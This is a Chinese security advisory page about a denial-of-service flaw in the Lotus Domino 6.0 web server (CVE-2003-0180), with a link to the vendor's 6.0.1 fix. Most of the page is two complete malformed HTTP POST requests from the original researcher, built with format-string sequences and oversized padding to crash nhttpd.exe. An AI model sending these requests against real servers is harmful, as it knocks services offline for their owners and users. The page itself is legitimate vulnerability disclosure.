安全研究

安全漏洞
IBM Lotus Domino Web Server HTTP POST远程拒绝服务攻击漏洞

发布日期:2003-02-17
更新日期:2003-03-04

受影响系统:
Lotus Domino 6.0
不受影响系统:
Lotus Domino 6.0.1
描述:
BUGTRAQ  ID: 6951
CVE ID: CVE-2003-0180

Lotus Domino Web服务器是一款商业性质HTTPD服务程序,提供多种服务,包括EMAIL,可运行在Linux/Unix和Microsoft Windows操作系统平台下。

Lotus Domino Web在处理畸形HTTP POST请求时存在问题,远程攻击者可以利用这个漏洞不完整POST请求和包含非法值字段的POST请求可导致nhttpd.exe崩溃,产生拒绝服务攻击。

攻击者有两种途径对Lotus Domino WEB服务器进行拒绝服务攻击,一是通过不完整POST请求,二是通过提交包含非法字段的POST请求,具体方法请参看测试方法的内容。

<*来源:Mark Litchfield (mark@ngssoftware.com
  
  链接:http://www[.]nextgenss[.]com/advisories/lotus-60dos.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Mark Litchfield (mark@ngssoftware.com)提供了如下测试方法:

1,不完整POST请求:

POST /test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=s_NotesForm;JournalEntry HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: http://ngssoftware/test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;
h_New,s_NotesForm;JournalEntry
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: ngssoftware
Content-Length: 8111
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Shimmer=ui:I&DNIDate:20021212&CalIDate:20021212&AMActive:1&NMTLP:20021217T032503Z&NMCount:0&CalView:D;
iwaSSL=0

Bi%5D%3DSj%28this%5Bi%5D%2Cstr%29%3B+return+this%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BPE%27%5D%26%26%26
function+%28name%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3D%3D+name%29+return+
true%3B+return+false%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BSU%27%5D%26%26%26function+%28obj%29%7Bthis%5B
this.length%5D%3Dobj%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BQV%27%5D%26%26%26function+%28fnEquals%29%7Bif
+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.
length%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var
+i%3D0%3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+
%3D%3D+%22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this
%5Bj%5D%29%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26
%26%26putAway%5B%27Ib%27%5D%5B%27addUnique%27%5D%26%26%26function%28vAdd%2C+fnCompare%29%7Bif%28this.indexOf
%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5D%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27
Ib%27%5D%5B%27indexOf%27%5D%26%26%26function%28vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C+this.length
%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fnCompare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7Delse%7Bif%28
this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27Ub%27%5D%2
6%26%26function%28start%2C+len%29%7Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B%2Bi%29%7Bthis%5Bi%5D%
3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-%3D+len%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BNT%27%5D%26
%26%26function+%28index%29%7Bvar+len%3Dthis.length%3B+if%28index+%3C+0+%7C%7C+%21%28index+%3C+len%29%29+return
%3B+for%28var+i%3Dindex%3Bi%3Clen-1%3Bi%2B%2B%29+this%5Bi%5D%3Dthis%5Bi%2B1%5D%3B+this.length+--%3B%7D%26%26
%26putAway%5B%27folderStorage%27%5D%5B%27BOY%27%5D%26%26%26function+%28aRemove%2CbDelAll%29%7Bfor%28var+k%3D
0%3Bk%3CaRemove.length%3Bk%2B%2B%29%7Bvar+name%3DaRemove%5Bk%5D%3B+for%28var+i%3Dthis.length-1%3Bi%3E%3D0%3B
i--%29+if%28this%5Bi%5D+%3D%3D+name%29%7Bfor%28var+j%3Di%3Bj%3C%3Dthis.length-2%3Bj%2B%2B%29+this%5Bj%5D%3D
this%5Bj%2B1%5D%3B+this.length+--%3B+if%28%21bDelAll%29+break%3B%7D%7Dreturn+this%3B%7D%26%26%26putAway%5B%2
7folderStorage%27%5D%5B%27dz%27%5D%26%26%26function+%28str%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%
29+this%5Bi%5D%3DSj%28this%5Bi%5D%2Cstr%29%3B+return+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%
27BPE%27%5D%26%26%26function+%28name%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3
D%3D+name%29+return+true%3B+return+false%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BSU%27%5D%26%26
%26function+%28obj%29%7Bthis%5Bthis.length%5D%3Dobj%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BQV%
27%5D%26%26%26function+%28fnEquals%29%7Bif+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3
Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.length%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+
this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var+i%3D0%3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks
%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+%3D%3D+%22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%
3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this%5Bj%5D%29%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue
%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27addUnique%27%5D%26%26%26
function%28vAdd%2C+fnCompare%29%7Bif%28this.indexOf%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5
D%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27indexOf%27%5D%26%26%26function%2
8vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C+this.length%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fn
Compare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7Delse%7Bif%28this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D
%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27Ub%27%5D%26%26%26function%28start2C+len%29%7
Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B%2Bi%29%7Bthis%5Bi%5D%3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-
%3D+len%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BNT%27%5D%26%26%26function+%28index%29%7Bvar+len
%3Dthis.length%3B+if%28index+%3C+0+%7C%7C+%21%28index+%3C+len%29%29+return%3B+for%28var+i%3Dindex%3Bi%3Clen-1
%3Bi%2B%2B%29+this%5Bi%5D%3Dthis%5Bi%2B1%5D%3B+this.length+--%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D
%5B%27BOY%27%5D%26%26%26function+%28aRemove%2CbDelAll%29%7Bfor%28var+k%3D0%3Bk%3CaRemove.length%3Bk%2B%2B%29%
7Bvar+name%3DaRemove%5Bk%5D%3B+for%28var+i%3Dthis.length-1%3Bi%3E%3D0%3Bi--%29+if%28this%5Bi%5D+%3D%3D+name%2
9%7Bfor%28var+j%3Di%3Bj%3C%3Dthis.length-2%3Bj%2B%2B%29+this%5Bj%5D%3Dthis%5Bj%2B1%5D%3B+this.length+--%3B+if
%28%21bDelAll%29+break%3B%7D%7Dreturn+this%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27dz%27%5D%26%2
6%26function+%28str%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+this%5Bi%5D%3DSj%28this%5Bi%5D%2Cstr%
29%3B+return+this%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BPE%27%5D%26%26%26function+%28name%29%
7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3D%3D+name%29+return+true%3B+return+false%
3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BSU%27%5D%26%26%26function+%28obj%29%7Bthis%5Bthis.length
%5D%3Dobj%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BQV%27%5D%26%26%26function+%28fnEquals%29%7Bif
+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.length
%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var+i%3D0%
3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+%3D%3D+%
22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this%5Bj%5D%2
9%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26%26%26putA
way%5B%27folderPageUnid%27%5D%5B%27addUnique%27%5D%26%26%26function%28vAdd%2C+fnCompare%29%7Bif%28this.indexO
f%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5D%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27
folderPageUnid%27%5D%5B%27indexOf%27%5D%26%26%26function%28vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C
+this.length%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fnCompare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7D
else%7Bif%28this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27folderPageUni
d%27%5D%5B%27Ub%27%5D%26%26%26function%28start%2C+len%29%7Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B
%2Bi%29%7Bthis%5Bi%5D%3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-%3D+len%3B%7D%26%26%26putAway%5B%27selectedFolderIn
dex%27%5D%26%26%260%26%26%26putAway%5B%27BSi%27%5D%26%26%26%26%26%26&h_EditAction=h_Next&h_SetEditCurrentScen
e=s_StdPageEdit&h_SetPublishReaders=&h_AlternateName=&h_CurrentFolderDocument=&h_CurrentFolderName=&h_SetEdit
NextScene=h_StdPageEditImage&h_SetReturnURL=&h_ReturnToPage=&h_NoSceneTrail=0&h_SetCommand=h_ShimmerSave&h_Se
tSaveDoc=1&s_MailSendReturnPage=&s_MailViewBefore=&h_SetPublishToFolder=&h_Name=foobar&h_SetPublishAction=&h_
EditSceneTrail=&h_WorkflowStage=&h_IsConflict=&h_DictionaryId=&From=Anonymous&Principal=Anonymous%25n%25n%25n
%25n%25n&Form=JournalEntry&Subject=foobar&Categories=testcat&h_RichTextItem=Body&Body=%3Cdiv%3Eghhgh%3CSPAN%3
E%3C%2FSPAN%3E%3C%2Fdiv%3E&h_CurrentPosition=40%2501%25u0103%2514%2501%2501%2501%2501%2501%2503%2501%2503%250
1%2501%2501%2501%2501%250C%2501%2506ihiih%25uE7F9%25u019F%25uE7F5%25u019F%25u9021%25u637F%25uAE47%25u6359%25u
AE5C%25u6359%25u9021%25u637F%2511%2501%2503%2501&h_ImageURL=&h_HeadlineText=&h_ImageCount=0&h_NewImageCount=0
&h_HeadlineCount=0&h_LinkURL=&h_LinkTitle=&h_PageText=&s_ImageUseCidRef=&s_EmbeddedImageInfo=&s_CidImageInfo=
&s_ConvertImage=0&FontNames=3&FontSize=2&HaikuEditorPlainTextArea=&s_UsePlainText=0&s_PlainEditor=0&h_Attachm
entTimes=&h_AttachmentNamesAlt=&h_AttachmentLengthsAlt=&h_AttachmentOldNames=

2,包含非法值字段的POST请求:

POST /test2.nsf/iNotes/Proxy/?EditDocument&Form=s_Validation&PresetFields=s_ValId;MailPreferenceEdit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://192.168.0.1/test2.nsf/iNotes/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_New,
s_NotesForm;ShimmerMailPref
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.3); .NET CLR 1.0.3705)
Host: 192.168.0.1
Content-Length: 2548
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Shimmer=DNIDate:20030114&CalIDate:20030114&NMTLP:20030114T191749Z&NMCount:0&SI_TLM:20030115T020722%2C4
0Z&MOFolder:%28%24Drafts%29&MOFolderLabel:Drafts&MOTLM:20030115T000509%2C10Z&ui:I; iwaSSL=0

%25%25PostCharset=ISO-8859-1&&EXCLUDEFROMVIEW=null&s_BrowserSuffix=mybrowser&h_CurrentSkinName=me&h_CurrentSki
nType=myskin&s_UNH=%n%n%n%n%n%n%n&s_UNH=abcdefg&s_UNH=qwerty&VAL_ExpandGroup=0&VAL_Type=1&VAL_Exhaustive=1&VAL
_DoConflictCheck=1&VAL_UNID=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB&VAL_Invitees=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC&VAL_Dat
eTimeList=DDDDDDDDDDDDDDDDDDDDDDDDDDD&Data=liberty&AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA=washere

建议:
厂商补丁:

Lotus
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

IBM Upgrade Lotus Domino 6.0.1 Upgrade
http://www14.software.ibm.com/webapp/download/search.jsp?q=&cat=&pf=&k=&dt=&go=y&rs=ESD-DMNTSRVRi&S_TACT=&S_CMP=&sb=r

浏览次数:3018
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客